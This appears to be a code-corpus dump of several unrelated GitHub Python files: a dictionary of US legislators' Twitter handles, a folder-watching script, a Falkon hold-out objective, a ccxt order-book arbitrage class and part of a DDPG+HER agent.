'Gardner, Cory': '@SenCoryGardner',\n 'Gibbs, Bob': '@RepBobGibbs',\n 'Gohmert, Louie': '@RepLouieGohmert',\n 'Goodlatte, Bob': '@RepGoodlatte',\n 'Gosar, Paul': '@RepGosar',\n 'Gowdy, Trey': '@TGowdySC',\n 'Granger, Kay': '@RepKayGranger',\n 'Grassley, Charles': '@ChuckGrassley',\n 'Graves, Sam': '@RepSamGraves',\n 'Graves, Tom': '@RepTomGraves',\n 'Green, Al': '@RepAlGreen',\n 'Green, Gene': '@RepGeneGreen',\n 'Griffith, H.': '@RepMGriffith',\n 'Grijalva, Raul': '@RepraulGrijalva',\n 'Guthrie, Brett': '@RepGuthrie',\n 'Gutierrez, Luis': '@RepGutierrez',\n 'Harper, Gregg': '@GreggHarper',\n 'Harris, Andy': '@RepAndyHarrisMD',\n 'Hartzler, Vicky': '@RepHartzler',\n 'Hastings, Alcee': '@RepHastingsFL',\n 'Heinrich, Martin': '@MartinHeinrich',\n 'Hensarling, Jeb': '@RepHensarling',\n 'Herrera Beutler, Jaime': '@HerreraBeutler',\n 'Higgins, Brian': '@RepBrianHiggins',\n 'Himes, James': '@JAHimes',\n 'Hirono, Mazie': '@MazieHirono',\n 'Hoeven, John': '@SenJohnHoeven',\n 'Hoyer, Steny': '@WhipHoyer',\n 'Huizenga, Bill': '@RepHuizenga',\n 'Hultgren, Randy': '@RepHultgren',\n 'Hunter, Duncan': '@Rep_Hunter',\n 'Isakson, John': '@SenatorIsakson',\n 'Issa, Darrell': '@DarrellIssa',\n 'Jackson Lee, Sheila': '@JacksonLeeTX18',\n 'Jenkins, Lynn': '@RepLynnJenkins',\n 'Johnson, Bill': '@RepBillJohnson',\n 'Johnson, Eddie': '@RepEBJ',\n 'Johnson, Henry': '@RepHankJohnson',\n 'Johnson, Ron': '@SenRonJohnson',\n 'Johnson, Sam': '@SamsPressShop',\n 'Jones, Walter': '@RepWalterJones',\n 'Jordan, Jim': '@Jim_Jordan',\n 'Kaptur, Marcy': '@RepMarcyKaptur',\n 'Keating, William': '@USRepKeating',\n 'Kelly, Mike': '@MikeKellyPA',\n 'Kind, Ron': '@RepRonKind',\n 'King, Peter': '@RepPeteKing',\n 'King, Steve': '@SteveKingIA',\n 'Kinzinger, Adam': '@RepKinzinger',\n 'Labrador, Raul': '@Raul_Labrador',\n 'Lamborn, Doug': '@RepDLamborn',\n 'Lance, Leonard': '@RepLanceNJ7',\n 'Langevin, James': '@JimLangevin',\n 'Lankford, James': '@SenatorLankford',\n 'Larsen, Rick': '@RepRickLarsen',\n 'Larson, John': '@RepJohnLarson',\n 'Latta, Robert': '@BobLatta',\n 'Leahy, Patrick': '@SenatorLeahy',\n 'Lee, Barbara': '@RepBarbaraLee',\n 'Lee, Mike': '@SenMikeLee',\n 'Levin, Sander': '@RepSandyLevin',\n 'Lewis, John': '@RepJohnLewis',\n 'Lipinski, Daniel': '@RepLipinski',\n 'LoBiondo, Frank': '@RepLoBiondo',\n 'Loebsack, David': '@DaveLoebsack',\n 'Lofgren, Zoe': '@RepZoeLofgren',\n 'Long, Billy': '@USRepLong',\n 'Lowey, Nita': '@NitaLowey',\n 'Lucas, Frank': '@RepFrankLucas',\n 'Luetkemeyer, Blaine': '@RepBlainePress',\n 'Lujan, Ben': '@RepBenRayLujan',\n 'Lynch, Stephen': '@RepStephenLynch',\n 'Maloney, Carolyn': '@RepMaloney',\n 'Marchant, Kenny': '@RepKenMarchant',\n 'Marino, Tom': '@RepTomMarino',\n 'Markey, Edward': '@SenMarkey',\n 'Matsui, Doris': '@DorisMatsui',\n 'McCain, John': '@SenJohnMcCain',\n 'McCarthy, Kevin': '@GOPLeader',\n 'McCaul, Michael': '@RepMcCaul',\n 'McClintock, Tom': '@RepMcClintock',\n 'McCollum, Betty': '@BettyMcCollum04',\n 'McGovern, James': '@RepMcGovern',\n 'McHenry, Patrick': '@PatrickMcHenry',\n 'McKinley, David': '@RepMcKinley',\n 'McMorris Rodgers, Cathy': '@CathyMcMorris',\n 'McNerney, Jerry': '@RepMcNerney',\n 'Meehan, Patrick': '@RepMeehan',\n 'Meeks, Gregory': '@GregoryMeeks',\n 'Moore, Gwen': '@RepGwenMoore',\n 'Moran, Jerry': '@JerryMoran',\n 'Murkowski, Lisa': '@LisaMurkowski',\n 'Murphy, Christopher': '@senmurphyoffice',\n 'Murphy, Tim': '@RepTimMurphy',\n 'Murray, Patty': '@PattyMurray',\n 'Nadler, Jerrold': '@RepJerryNadler',\n 'Napolitano, Grace': '@GraceNapolitano',\n 'Neal, Richard': '@RepRichardNeal',\n 'Noem, Kristi': '@RepKristiNoem',\n 'Norton, Eleanor': '@EleanorNorton',\n 'Nunes, Devin': '@Rep_DevinNunes',\n 'Olson, Pete': '@RepPeteOlson',\n 'Palazzo, Steven': '@CongPalazzo',\n 'Pallone, Frank': '@FrankPallone',\n 'Pascrell, Bill': '@BillPascrell',\n 'Paul, Rand': '@RandPaul',\n 'Paulsen, Erik': '@RepErikPaulsen',\n 'Pearce, Stevan': '@RepStevePearce',\n 'Pelosi, Nancy': 'NonecyPelosi',\n 'Perlmutter, Ed': '@RepPerlmutter',\n 'Peters, Gary': '@SenGaryPeters',\n 'Peterson, Collin': '@collinpeterson',\n 'Pingree, Chellie': '@ChelliePingree',\n 'Poe, Ted': '@JudgeTedPoe',\n 'Polis, Jared': '@RepJaredPolis',\n 'Portman, Robert': '@SenRobPortman',\n 'Posey, Bill': '@CongBillPosey',\n 'Price, David': '@RepDavidEPrice',\n 'Quigley, Mike': '@RepMikeQuigley',\n 'Reed, Tom': '@RepTomReed',\n 'Reichert, David': '@DaveReichert',\n 'Renacci, James': '@RepJimRenacci',\n 'Richmond, Cedric': '@RepRichmond',\n 'Roby, Martha': '@RepMarthaRoby',\n 'Roe, David': '@DrPhilRoe',\n 'Rogers, Harold': '@RepHalRogers',\n 'Rogers, Mike': '@RepMikeRogersAL',\n 'Rohrabacher, Dana': '@reprohrabacher',\n 'Rokita, Todd': '@ToddRokita',\n 'Rooney, Thomas': '@TomRooney',\n 'Ros-Lehtinen, Ileana': '@RosLehtinen',\n 'Roskam, Peter': '@PeterRoskam',\n 'Ross, Dennis': '@RepDennisRoss',\n 'Roybal-Allard, Lucille': '@RepRoybalAllard',\n 'Royce, Edward': '@RepEdRoyce',\n 'Rubio, Marco': '@SenRubioPress',\n 'Ruppersberger, C.': '@Call_Me_Dutch',\n 'Rush, Bobby': '@RepBobbyRush',\n 'Ryan, Paul': '@SpeakerRyan',\n 'Ryan, Tim': '@RepTimRyan',\n 'Sablan, Gregorio': None,\n 'Sarbanes, John': '@RepSarbanes',\n 'Scalise, Steve': '@SteveScalise',\n 'Schakowsky, Janice': '@JanSchakowsky',\n 'Schiff, Adam': '@RepAdamSchiff',\n 'Schrader, Kurt': '@RepSchrader',\n 'Schumer, Charles': '@SenSchumer',\n 'Schweikert, David': '@RepDavid',\n 'Scott, Austin': '@AustinScottGA08',\n 'Scott, David': '@RepDavidScott',\n 'Scott, Robert': '@BobbyScott',\n 'Scott, Tim': '@SenatorTimScott',\n 'Sensenbrenner, F.': '@JimPressOffice',\n 'Serrano, Jose': '@RepJoseSerrano',\n 'Sessions, Pete': '@PeteSessions',\n 'Sewell, Terri': '@RepTerriSewell',\n 'Shelby, Richard': '@SenShelby',\n 'Sherman, Brad': '@BradSherman',\n 'Shimkus, John': '@RepShimkus',\n 'Shuster, Bill': '@RepBillShuster',\n 'Simpson, Michael': '@CongMikeSimpson',\n 'Sires, Albio': '@RepSires',\n 'Slaughter, Louise': '@LouiseSlaughter',\n 'Smith, Adam': '@RepAdamSmith',\n 'Smith, Adrian': '@RepAdrianSmith',\n 'Smith, Christopher': '@RepChrisSmith',\n 'Smith, Lamar': '@LamarSmithTX21',\n 'Speier, Jackie': '@RepSpeier',\n 'Stivers, Steve': '@RepSteveStivers',\n 'Sanchez, Linda': '@RepLindaSanchez',\n 'Thompson, Bennie': '@BennieGThompson',\n 'Thompson, Mike': '@RepThompson',\n 'Thompson, Glenn': '@CongressmanGT',\n 'Thornberry, Mac': '@MacTXPress',\n 'Thune, John': '@SenJohnThune',\n 'Tiberi, Patrick': '@pattiberi',\n 'Tipton, Scott': '@RepTipton',\n 'Tonko, Paul': '@RepPaulTonko',\n 'Toomey, Patrick': '@SenToomey',\n 'Tsongas, Niki': '@NikiInTheHouse',\n 'Turner, Michael': '@RepMikeTurner',\n 'Upton, Fred': '@RepFredUpton',\n 'Van Hollen, Chris': '@ChrisVanHollen',\n 'Velazquez, Nydia': '@NydiaVelazquez',\n 'Visclosky, Peter': '@RepVisclosky',\n 'Walberg, Tim': '@RepWalberg',\n 'Walden, Greg': '@RepGregWalden',\n 'Walz, Timothy': '@RepTimWalz',\n 'Wasserman Schultz, Debbie': '@RepDWStweets',\n 'Waters, Maxine': '@MaxineWaters',\n 'Webster, Daniel': '@RepWebster',\n 'Welch, Peter': '@PeterWelch',\n 'Wilson, Joe': '@RepJoeWilson',\n 'Wilson, Frederica': '@RepWilson',\n 'Wittman, Robert': '@RobWittman',\n 'Womack, Steve': '@Rep_SteveWomack',\n 'Woodall, Rob': '@RepRobWoodall',\n 'Wyden, Ron': '@RonWyden',\n 'Yarmuth, John': '@RepJohnYarmuth',\n 'Yoder, Kevin': '@RepKevinYoder',\n 'Young, Don': '@RepDonYoung',\n 'Young, Todd': '@SenToddYoung',\n 'Heller, Dean': '@SenDeanHeller',\n 'Amodei, Mark': '@MarkAmodeiNV2',\n 'Bonamici, Suzanne': '@RepBonamici',\n 'DelBene, Suzan': '@RepDelBene',\n 'Massie, Thomas': '@RepThomasMassie',\n 'Payne, Donald': '@RepDonaldPayne',\n 'Schatz, Brian': '@SenBrianSchatz',\n 'Foster, Bill': '@RepBillFoster',\n 'Titus, Dina': '@RepDinaTitus',\n 'Cotton, Tom': '@SenTomCotton',\n 'Sinema, Kyrsten': '@RepSinema',\n 'LaMalfa, Doug': '@RepLaMalfa',\n 'Huffman, Jared': '@RepHuffman',\n 'Bera, Ami': '@RepBera',\n 'Cook, Paul': '@RepPaulCook',\n 'Swalwell, Eric': '@RepSwalwell',\n 'Valadao, David': '@RepDavidValadao',\n 'Brownley, Julia': '@JuliaBrownley26',\n 'Cardenas, Tony': '@RepCardenas',\n 'Ruiz, Raul': '@CongressmanRuiz',\n 'Takano, Mark': '@RepMarkTakano',\n 'Lowenthal, Alan': '@RepLowenthal',\n 'Vargas, Juan': '@RepJuanVargas',\n 'Peters, Scott': '@RepScottPeters',\n 'Esty, Elizabeth': '@RepEsty',\n 'Yoho, Ted': '@RepTedYoho',\n 'DeSantis, Ron': '@RepDeSantis',\n 'Frankel, Lois': '@RepLoisFrankel',\n 'Collins, Doug': '@RepDougCollins',\n 'Gabbard, Tulsi': '@TulsiPress',\n 'Duckworth, Tammy': '@SenDuckworth',\n 'Davis, Rodney': '@RodneyDavis',\n 'Bustos, Cheri': '@RepCheri',\n 'Walorski, Jackie': '@RepWalorski',\n 'Brooks, Susan': '@SusanWBrooks',\n 'Messer, Luke': '@RepLukeMesser',\n 'Barr, Garland': '@RepAndyBarr',\n 'Warren, Elizabeth': '@SenWarren',\n 'Kennedy, Joseph': '@RepJoeKennedy',\n 'Delaney, John': '@RepJohnDelaney',\n 'King, Angus': '@SenAngusKing',\n 'Kildee, Daniel': '@RepDanKildee',\n 'Nolan, Richard': '@USRepRickNolan',\n 'Wagner, Ann': '@RepAnnWagner',\n 'Daines, Steve': '@SteveDaines',\n 'Hudson, Richard': '@RepRichHudson',\n 'Pittenger, Robert': '@RepPittenger',\n 'Meadows, Mark': '@RepMarkMeadows',\n 'Holding, George': '@RepHolding',\n 'Heitkamp, Heidi': '@SenatorHeitkamp',\n 'Cramer, Kevin': '@RepKevinCramer',\n 'Fischer, Deb': '@SenatorFischer',\n 'Kuster, Ann': '@RepAnnieKuster',\n 'Lujan Grisham, Michelle': '@RepLujanGrisham',\n 'Meng, Grace': '@RepGraceMeng',\n 'Jeffries, Hakeem': '@RepJeffries',\n 'Maloney, Sean': '@RepSeanMaloney',\n 'Collins, Chris': '@RepChrisCollins',\n 'Wenstrup, Brad': '@RepBradWenstrup',\n 'Beatty, Joyce': '@RepBeatty',\n 'Joyce, David': '@RepDaveJoyce',\n 'Bridenstine, Jim': '@RepJBridenstine',\n 'Mullin, Markwayne': '@RepMullin',\n 'Perry, Scott': '@RepScottPerry',\n 'Rothfus, Keith': '@KeithRothfus',\n 'Cartwright, Matthew': '@RepCartwright',\n 'Rice, Tom': '@RepTomRice',\n 'Cruz, Ted': '@SenTedCruz',\n 'Weber, Randy': '@TXRandy14',\n \"O'Rourke, Beto\": '@RepBetoORourke',\n 'Castro, Joaquin': '@JoaquinCastrotx',\n 'Williams, Roger': '@RepRWilliams',\n 'Veasey, Marc': '@RepVeasey',\n 'Vela, Filemon': '@RepFilemonVela',\n 'Stewart, Chris': '@RepChrisStewart',\n 'Kaine, Timothy': '@SenKaineOffice',\n 'Kilmer, Derek': '@RepDerekKilmer',\n 'Heck, Denny': '@RepDennyHeck',\n 'Pocan, Mark': '@RepMarkPocan',\n 'Kelly, Robin': '@RepRobinKelly',\n 'Sanford, Marshall': '@RepSanfordSC',\n 'Smith, Jason': '@RepJasonSmith',\n 'Booker, Cory': '@senbookeroffice',\n 'Clark, Katherine': '@RepKClark',\n 'Byrne, Bradley': '@RepByrne',\n 'Brat, David': '@RepDaveBrat',\n 'Norcross, Donald': '@DonaldNorcross',\n 'Adams, Alma': '@RepAdams',\n 'Palmer, Gary': '@USRepGaryPalmer',\n 'Hill, French': '@RepFrenchHill',\n 'Westerman, Bruce': '@RepWesterman',\n 'McSally, Martha': '@RepMcSally',\n 'Gallego, Ruben': '@RepRubenGallego',\n 'DeSaulnier, Mark': '@RepDeSaulnier',\n 'Knight, Steve': '@SteveKnight25',\n 'Aguilar, Pete': '@reppeteaguilar',\n 'Lieu, Ted': '@RepTedLieu',\n 'Torres, Norma': '@NormaJTorres',\n 'Walters, Mimi': '@RepMimiWalters',\n 'Buck, Ken': '@RepKenBuck',\n 'Curbelo, Carlos': '@RepCurbelo',\n 'Carter, Buddy': '@RepBuddyCarter',\n 'Hice, Jody': '@congressmanhice',\n 'Loudermilk, Barry': '@RepLoudermilk',\n 'Allen, Rick': '@reprickallen',\n 'Blum, Rod': '@RepRodBlum',\n 'Young, David': '@RepDavidYoung',\n 'Bost, Mike': '@RepBost',\n 'Abraham, Ralph': '@RepAbraham',\n 'Graves, Garret': '@RepGarretGraves',\n 'Moulton, Seth': '@teammoulton',\n 'Poliquin, Bruce': '@RepPoliquin',\n 'Moolenaar, John': '@RepMoolenaar',\n 'Bishop, Mike': '@RepMikeBishop',\n 'Trott, Dave': '@repdavetrott',\n 'Dingell, Debbie': '@RepDebDingell',\n 'Lawrence, Brenda': '@RepLawrence',\n 'Emmer, Tom': '@RepTomEmmer',\n 'Rouzer, David': '@RepDavidRouzer',\n 'MacArthur, Tom': '@RepTomMacArthur',\n 'Watson Coleman, Bonnie': '@RepBonnie',\n 'Zeldin, Lee': '@RepLeeZeldin',\n 'Rice, Kathleen': '@RepKathleenRice',\n 'Stefanik, Elise': '@RepStefanik',\n 'Katko, John': '@RepJohnKatko',\n 'Russell, Steve': '@RepRussell',\n 'Costello, Ryan': '@RepRyanCostello',\n 'Boyle, Brendan': '@CongBoyle',\n 'Ratcliffe, John': '@RepRatcliffe',\n 'Hurd, Will': '@hurdonthehill',\n 'Babin, Brian': '@RepBrianBabin',\n 'Love, Mia': '@repmialove',\n 'Beyer, Donald': '@repdonbeyer',\n 'Comstock, Barbara': '@RepComstock',\n 'Plaskett, Stacey': '@staceyplaskett',\n 'Newhouse, Dan': '@RepNewhouse',\n 'Grothman, Glenn': '@RepGrothman',\n 'Mooney, Alex': '@RepAlexMooney',\n 'Jenkins, Evan': '@RepEvanJenkins',\n 'Amata, Aumua': '@RepAmata',\n 'Sullivan, Dan': '@SenDanSullivan',\n 'Perdue, David': '@sendavidperdue',\n 'Ernst, Joni': '@SenJoniErnst',\n 'Tillis, Thom': '@senthomtillis',\n 'Rounds, Mike': '@SenatorRounds',\n 'Walker, Mark': '@RepMarkWalker',\n 'Sasse, Benjamin': '@SenSasse',\n 'Donovan, Daniel': '@RepDanDonovan',\n 'Kelly, Trent': '@reptrentkelly',\n 'LaHood, Darin': '@RepLaHood',\n 'Davidson, Warren': '@WarrenDavidson',\n 'Hanabusa, Colleen': '@RepHanabusa',\n 'Comer, James': '@KYComer',\n 'Evans, Dwight': '@RepDwightEvans',\n 'Harris, Kamala': '@SenKamalaHarris',\n 'Kennedy, John': '@SenJohnKennedy',\n 'Hassan, Margaret': '@Senatorhassan',\n 'Cortez Masto, Catherine': '@sencortezmasto',\n 'Schneider, Bradley': '@repschneider',\n 'Shea-Porter, Carol': '@repsheaporter',\n \"O'Halleran, Tom\": '@repohalleran',\n 'Biggs, Andy': '@RepAndyBiggsAZ',\n 'Khanna, Ro': '@RepRoKhanna',\n 'Panetta, Jimmy': '@RepJimmyPanetta',\n 'Carbajal, Salud': '@RepCarbajal',\n 'Barragan, Nanette': '@RepBarragan',\n 'Correa, J.': '@reploucorrea',\n 'Blunt Rochester, Lisa': '@RepBRochester',\n 'Gaetz, Matt': '@RepMattGaetz',\n 'Dunn, Neal': '@drnealdunnfl2',\n 'Rutherford, John': '@RepRutherfordFL',\n 'Lawson, Al': '@RepAlLawsonJr',\n 'Murphy, Stephanie': '@RepStephMurphy',\n 'Soto, Darren': '@RepDarrenSoto',\n 'Demings, Val': '@RepValDemings',\n 'Crist, Charlie': '@repcharliecrist',\n 'Mast, Brian': '@repbrianmast',\n 'Rooney, Francis': '@RepRooney',\n 'Ferguson, A.': '@RepDrewFerguson',\n 'Krishnamoorthi, Raja': '@congressmanraja',\n 'Banks, Jim': '@RepJimBanks',\n 'Hollingsworth, Trey': '@reptrey',\n 'Marshall, Roger': '@RepMarshall',\n 'Higgins, Clay': '@RepClayHiggins',\n 'Johnson, Mike': '@RepMikeJohnson',\n 'Brown, Anthony': '@RepAnthonyBrown',\n 'Raskin, Jamie': '@repraskin',\n 'Bergman, Jack': '@RepJackBergman',\n 'Mitchell, Paul': '@RepPaulMitchell',\n 'Lewis, Jason': '@RepJasonLewis',\n 'Budd, Ted': '@RepTedBudd',\n 'Bacon, Don': '@repdonbacon',\n 'Gottheimer, Josh': '@RepJoshG',\n 'Rosen, Jacky': '@repjackyrosen',\n 'Kihuen, Ruben': '@RepKihuen',\n 'Suozzi, Thomas': '@RepTomSuozzi',\n 'Espaillat, Adriano': '@RepEspaillat',\n 'Faso, John': '@RepJohnFaso',\n 'Tenney, Claudia': '@RepTenney',\n 'Fitzpatrick, Brian': '@repbrianfitz',\n 'Smucker, Lloyd': '@RepSmucker',\n 'Gonzalez-Colon, Jenniffer': '@repjenniffer',\n 'Kustoff, David': '@repdavidkustoff',\n 'Gonzalez, Vicente': '@RepGonzalez',\n 'Arrington, Jodey': '@RepArrington',\n 'Taylor, Scott': '@RepScottTaylor',\n 'McEachin, A.': '@RepMcEachin',\n 'Garrett, Thomas': '@Rep_Tom_Garrett',\n 'Jayapal, Pramila': '@RepJayapal',\n 'Gallagher, Mike': '@RepGallagher',\n 'Cheney, Liz': '@RepLizCheney',\n 'Strange, Luther': '@SenatorStrange',\n 'Estes, Ron': '@RepRonEstes'\n }","repo_name":"mbeaver502/CyberLawBot","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":31279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24469774815","text":"import os\nimport time\nfrom pathlib import Path\nfrom watchdog.events import FileSystemEventHandler\nfrom watchdog.observers import Observer\nimport InvestigateFile\nimport RecordDetails\n\n\ndef get_file_extension(file_name):\n file_tup = os.path.splitext(file_name)\n return file_tup[1]\n\n\ndef get_file_name(src_path, wachdirectory):\n len_watch_dir_path = len(wachdirectory)\n len_event_src_path = len(src_path)\n watch_file = src_path[len_watch_dir_path:len_event_src_path]\n return watch_file\n\n\n# Creating class MyHandler which extends FileSystemEventHandler(Watchdog api class)\nclass MyHandler(FileSystemEventHandler):\n # Fetching watch folder from property file.\n watchDirectory = InvestigateFile.get_value_from_properties_file_by_key(\"WatchDIR\")\n # Below we are sorting the files by modified date\n sorted(Path(watchDirectory).iterdir(), key=os.path.getmtime, reverse=True)\n\n # Overriding methods from FileSystemEventHandler class on_modified and on_created\n def on_modified(self, event):\n file_path = event.src_path\n event_type = event.event_type\n # getting below last modified date and time\n # modified_date = time.ctime(os.path.getmtime(file_path))\n # print(file_path, \" is \", event_type, \" on \", modified_date)\n file_name = get_file_name(file_path, self.watchDirectory)\n fileStartsWith = InvestigateFile.get_value_from_properties_file_by_key(\"FileStartsWith\")\n if file_name.startswith(fileStartsWith):\n print(file_name, \" is \", event_type)\n InvestigateFile.read_log_file(file_path, event_type)\n\n def on_created(self, event):\n event_type = event.event_type\n file_path = event.src_path\n # getting created date time\n # create_date = time.ctime(os.path.getctime(event.src_path))\n # print(file_path, \" is \", event_type, \" on \", create_date)\n file_name = get_file_name(file_path, self.watchDirectory)\n # file_extension = get_file_extension(file_name)\n fileStartsWith = InvestigateFile.get_value_from_properties_file_by_key(\"FileStartsWith\")\n if file_name.startswith(fileStartsWith):\n if RecordDetails.last_ran_file_name == file_name:\n event_type = \"modified\"\n else:\n RecordDetails.log_last_running_time = \"\"\n print(file_name, \" is \", event_type)\n InvestigateFile.read_log_file(file_path, event_type)\n RecordDetails.last_ran_file_name = file_name\n\n\nevent_handler = MyHandler()\nobserver = Observer()\npath = InvestigateFile.get_value_from_properties_file_by_key(\"WatchDIR\")\nobserver.schedule(event_handler, path, recursive=False)\nobserver.start()\ntry:\n print(\"Started Monitoring Folder:\", path)\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()\n","repo_name":"gdputilties/FileMonitoring","sub_path":"MonitorFile.py","file_name":"MonitorFile.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24013558888","text":"from typing import Dict, Optional\n\nimport torch\n\nimport falkon.kernels\nfrom falkon.hopt.objectives.exact_objectives.utils import jittering_cholesky\nfrom falkon.hopt.objectives.objectives import HyperoptObjective\nfrom falkon.hopt.utils import get_scalar\n\n\nclass HoldOut(HyperoptObjective):\n def __init__(\n self,\n kernel: falkon.kernels.DiffKernel,\n centers_init: torch.Tensor,\n penalty_init: torch.Tensor,\n opt_centers: bool,\n opt_penalty: bool,\n val_pct: float,\n per_iter_split: bool,\n centers_transform: Optional[torch.distributions.Transform] = None,\n pen_transform: Optional[torch.distributions.Transform] = None,\n ):\n super().__init__(kernel, centers_init, penalty_init, opt_centers, opt_penalty, centers_transform, pen_transform)\n self.x_train, self.y_train = None, None\n self.losses: Optional[Dict[str, torch.Tensor]] = None\n self.per_iter_split = per_iter_split\n self.val_pct = val_pct\n self.tr_indices, self.val_indices = None, None\n\n def forward(self, X, Y):\n # X_tr, Y_tr are used for predictions. They contain the whole dataset (=retraining)\n self.x_train, self.y_train = X, Y\n if self.tr_indices is None or self.per_iter_split:\n num_val = int(X.shape[0] * self.val_pct)\n all_idx = torch.randperm(X.shape[0])\n self.val_indices = all_idx[:num_val]\n self.tr_indices = all_idx[num_val:]\n\n Xtr = X[self.tr_indices]\n Xval = X[self.val_indices]\n Ytr = Y[self.tr_indices]\n Yval = Y[self.val_indices]\n\n kmval = self.kernel(self.centers, Xval)\n alpha = self._calc_intermediate(Xtr, Ytr)\n val_preds = kmval.T @ alpha\n loss = torch.mean(torch.square(Yval - val_preds))\n\n self._save_losses(loss)\n return loss\n\n def predict(self, X):\n if self.x_train is None or self.y_train is None:\n raise RuntimeError(\"Call forward at least once before calling predict.\")\n with torch.autograd.no_grad():\n alpha = self._calc_intermediate(self.x_train, self.y_train)\n kms = self.kernel(self.centers, X)\n return kms.T @ alpha\n\n @property\n def train_pct(self):\n return 100.0 - self.val_pct\n\n def _calc_intermediate(self, X, Y):\n variance = self.penalty * X.shape[0]\n sqrt_var = torch.sqrt(variance)\n\n kmn = self.kernel(self.centers, X)\n kmm = self.kernel(self.centers, self.centers)\n L = jittering_cholesky(kmm) # L @ L.T = kmm\n # A = L^{-1} K_mn / (sqrt(n*pen))\n A = torch.linalg.solve_triangular(L, kmn, upper=False) / sqrt_var\n AAT = A @ A.T\n # B = A @ A.T + I\n B = AAT + torch.eye(AAT.shape[0], device=X.device, dtype=X.dtype)\n LB = jittering_cholesky(B) # LB @ LB.T = B\n AYtr = A @ Y\n c = torch.linalg.solve_triangular(LB, AYtr, upper=False) / sqrt_var\n\n tmp1 = torch.linalg.solve_triangular(LB.T, c, upper=True)\n alpha = torch.linalg.solve_triangular(L.T, tmp1, upper=True)\n return alpha\n\n def _save_losses(self, holdout):\n self.losses = {\n \"hold-out\": holdout.detach(),\n }\n\n def __repr__(self):\n return (\n f\"NystromHoldOut(\"\n f\"kernel={self.kernel}, \"\n f\"penalty={get_scalar(self.penalty)}, \"\n f\"num_centers={self.centers.shape[0]}, \"\n f\"val_pct={self.val_pct}, \"\n f\"per_iter_split={self.per_iter_split})\"\n )\n","repo_name":"FalkonML/falkon","sub_path":"falkon/hopt/objectives/exact_objectives/holdout.py","file_name":"holdout.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"6"} +{"seq_id":"34641409875","text":"import calculator\nimport time\nimport ccxt\n\nclass Box:\n #a node that can be imlanted on any computer, for each node on every computer you can divide the time of sample by using different IP's\n\n def __init__(self, enable_limit = False, usd_limit = 5, reverse = False, depth = 100, symbol = \"BTC/USDT\", enable_recursion= False):\n self.usd_limit = usd_limit\n self.enable_limit = enable_limit\n self.reverse = reverse\n self.depth = depth\n self.symbol = symbol\n self.inOrder = False\n self.enable_recursion = enable_recursion\n\n if(reverse):\n self.A = ccxt.kraken({\n 'enableRateLimit': True # this option enables the built-in rate limiter (no ip ban)\n })\n self.B = ccxt.binance({\n 'enableRateLimit': True # this option enables the built-in rate limiter (no ip ban)\n })\n else:\n self.A = ccxt.binance({\n 'enableRateLimit': True # this option enables the built-in rate limiter (no ip ban)\n })\n self.B = ccxt.kraken({\n 'enableRateLimit': True # this option enables the built-in rate limiter (no ip ban)\n })\n\n def run(self):\n\n #while(self.inOrder==False):\n bookA = self.A.fetch_order_book(self.symbol, self.depth)\n bookB = self.B.fetch_order_book(self.symbol, self.depth)\n\n asks = bookA[\"asks\"]\n bids = bookB[\"bids\"]\n\n results = calc.analyze(asks, bids)\n\n print(results)\n\n if(self.enable_recursion):\n time.sleep(6)\n self.run()\n\n def get_inOrder(self):#inOrder is true is currently in the middle of an order\n return self.get_inOrder\n\n def set_inOrder(self, bool):\n self.inOrder = bool\n\n\ncalc = calculator.calculator()\n \n","repo_name":"officialnico/arb","sub_path":"Box.py","file_name":"Box.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"70292634429","text":"import torch\nimport os\nimport numpy as np\nimport time\nfrom models.actor import VanillaActor, PointnetMLP\nfrom models.critic import VanillaCritic, PointnetMLP_critic\nfrom rl_modules.replay_buffer import replay_buffer\nfrom rl_modules.base_agent import base_agent\nfrom rl_modules.normalizer import normalizer\nfrom rl_modules.her import her_sampler\nfrom rl_modules.utils import *\n\n\"\"\"\nddpg with HER\n\"\"\"\n\n\nclass ddpg_agent(base_agent):\n def __init__(self, args, dummy_env, env_params, policy_params):\n super().__init__(args, env_params)\n self.agent_type = 'ddpg_her'\n # create new run or resume from previous\n self._fresh_or_resume()\n self.args.flat2dict = dummy_env.flat2dict\n # sampling function (use her or not)\n # assuming all envs have the same compute reward method\n her_module = her_sampler(\n self.args.replay_strategy, self.args.replay_k, dummy_env.compute_reward)\n self.sample_func = her_module.sample_her_transitions\n self.buffers = None\n # create new modules or resumed from checkpoint\n if self.resume_training and self.args.eval and self.args.load_cycle is not None: # load actor only for eval\n self.actor_network = self.ckpt_dict['actor_network']\n self.o_norm = self.ckpt_dict['o_norm']\n self.g_norm = self.ckpt_dict['g_norm']\n self.actor_network.args = self.args\n self.o_norm.args = self.args\n self.g_norm.args = self.args\n elif self.resume_training: # load everything for resuming training\n self.actor_network = self.ckpt_dict['actor_network']\n self.actor_target_network = self.ckpt_dict['actor_target_network']\n self.critic_network = self.ckpt_dict['critic_network']\n self.critic_target_network = self.ckpt_dict['critic_target_network']\n self.actor_optim = self.ckpt_dict['actor_optim']\n self.critic_optim = self.ckpt_dict['critic_optim']\n self.o_norm = self.ckpt_dict['o_norm']\n self.g_norm = self.ckpt_dict['g_norm']\n self.actor_network.args = self.args\n self.actor_target_network.args = self.args\n self.critic_network.args = self.args\n self.critic_target_network.args = self.args\n self.o_norm.args = self.args\n self.g_norm.args = self.args\n if 'buffers' in self.ckpt_dict:\n self.buffers = self.ckpt_dict['buffers']\n else:\n assert self.args.eval\n else:\n self.actor_func = PointnetMLP if args.point_cloud else VanillaActor\n self.critic_func = PointnetMLP_critic if args.point_cloud else VanillaCritic\n self.actor_network = self.actor_func(**policy_params)\n self.critic_network = self.critic_func(**policy_params)\n self.actor_target_network = self.actor_func(**policy_params)\n self.actor_target_network.load_state_dict(\n self.actor_network.state_dict())\n self.critic_target_network = self.critic_func(**policy_params)\n self.critic_target_network.load_state_dict(\n self.critic_network.state_dict())\n if self.args.point_cloud:\n self._load_pointnet()\n # create the optimizer\n self.actor_optim = torch.optim.Adam(\n self.actor_network.parameters(), lr=self.args.lr_actor)\n self.critic_optim = torch.optim.Adam(\n 